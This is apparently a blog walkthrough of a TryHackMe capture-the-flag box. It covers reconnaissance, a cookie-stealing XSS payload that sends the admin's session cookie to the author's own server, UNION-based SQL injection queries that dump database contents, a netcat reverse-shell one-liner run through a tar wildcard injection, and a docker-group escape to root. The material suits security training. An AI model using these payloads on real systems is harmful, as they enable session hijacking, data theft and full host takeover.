This is a medium rated box from TryHackMe.
First we are going to start with an nmap scan to check for open ports and what type of services are open:
Command: nmap -sC -sV $IP
Only 3 open ports, where two of them are websites: port 80 and port 32768. Let's check port 80.
Before we do anything else, let's start a gobuster scan.
Command: Gobuster dir -u $IP -w /path/to/wordlist/ -x /extension/type
We can check the robots.txt, but there is nothing much there, just a /admin directory which we found it with gobuster. So it's time to dig the website.
Looks like there are two users, michael and jake, so maybe will be some passwords that we will find. I tried some basic SQL injection against the login form, but nothing worked, so the next thing I did was to create an account.
After we login with the newly created account we can see that there is nothing much that we can do. After trying all sorts of things, the only "positive" result was from XSS injection on the "report listing to admins" functionality.
Command: <<SCRIPT>alert("XSS");//\<</SCRIPT>
After some more digging I saw that the website uses cookies and combined with the report functionality, it could mean only one thing: cookie stealing.
Cookie stealing you may ask?Yes!
Everytime we report a post, the admin visits that post and sends us a message telling us if he found something wrong or not. Now let's test it.
First I used this script (but you can do it manually too): https://github.com/tacticthreat/CookieHeist
I hosted the files using a python server: python -m http.server
Now you need to create a new item with the next XSS command:
Command: <script
javascript:text>document.location="http://10.8.0.116/cookiesteal-simple.php?c="
+ document.cookie + "&t=Alert"; </script>
Then use the report functionality by reporting the first item on the list, and intercept the request with BurpSuite.
Then change the item number from 1 to the number of your XSS item.
After you press the Report button, on the python server you'll get a request with a cookie, which is the admin cookie.
Now press F12 and change your cookie with the admin's cookie, refresh the page and an administration panel should appear.
After this I've been stuck again for a while. The admin that clicked the reported links was michael, I tried to change to the other admin, jake but no luck. I even tried sqlmap against the ?user=1 parameter, but again no luck. How about manual SQL injection?
If we use a ' (single quote) on the ?user=1 parameter we get an error like in the image below.
Using ORDER BY keyword to sort the records in ascending or
descending. From
the screenshot, you can see we have got an error at the order by 5 which means it consists only of 4 records.
Now try to pass wrong input into the database through URL by
replacing user=1 with user=-1 and the result should be something like this:
Let's see if we can do a union injection, and what union is going to do, is going to overwrite what the database says to use.
Using this method, let's retrieve the database.
Command: -1 union select (select
group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),2,3,4-- -
After we know what the database is, we can know retrieve the tables.
Command: -1 union select (select
group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA =
'marketplace'),2,3,4-- -
And finally we can get the columns.
Command: -1 union select (select group_concat(TABLE_NAME,
COLUMN_NAME, "\n" SEPARATOR ':') from INFORMATION_SCHEMA.COLUMNS
where TABLE_SCHEMA = 'marketplace'),2,3,4-- -
I managed to dump some hashes, but I wasn't able to crack them, so I started to look for something else and I found something interesting:
Command: http://10.10.10.61/admin?user=-1%20union%20select%20(select%20group_concat(message_content,%20%22\n%22%20SEPARATOR%20%27:%27)%20from%20marketplace.messages),2,3,4--%20-
Looks like we have a password, now we can get a shell on the box by using ssh. The password that we found is for user jake. The first thing I always do is to check the user privileges and I do that by typing sudo -l.
Looks like we can execute the backup.sh as user michael. Here is the content of that file:
Commands:
- echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.0.116 1337 >/tmp/f" > shell.sh
- echo "" > "--checkpoint-action=exec=sh shell.sh"
- echo "" > --checkpoint=1
Now that we successfully have a shell as user michael we can check the groups that we are in.
One group that stands out is the docker group.
Before executing the command that gives us the root shell, let's check what images are inside the docker.
Command: docker images
Using the command below I was able to get root.
Command: docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Comments
Post a Comment